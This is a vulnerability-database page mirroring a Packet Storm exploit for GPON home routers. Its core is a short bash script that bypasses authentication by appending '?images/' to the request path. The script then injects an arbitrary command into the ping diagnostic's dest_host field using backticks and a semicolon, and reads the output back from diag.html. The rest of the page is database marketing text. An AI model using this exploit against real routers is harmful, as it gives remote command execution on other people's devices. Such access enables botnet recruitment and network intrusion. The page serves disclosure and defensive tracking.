Lucene search
K

GPON Router Authentication Bypass / Comand Injection

🗓️ 04 May 2018 00:00:00Reported by vpnmentorType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 315 Views

GPON Router Authentication Bypass and Command Injectio

Related
Code
`#!/bin/bash  
  
echo "[+] Sending the Commanda| "  
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices  
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null  
echo "[+] Waitinga|."  
sleep 3  
echo "[+] Retrieving the ouputa|."  
curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 May 2018 00:00Current
1.3Low risk
Vulners AI Score1.3
EPSS0.9995
315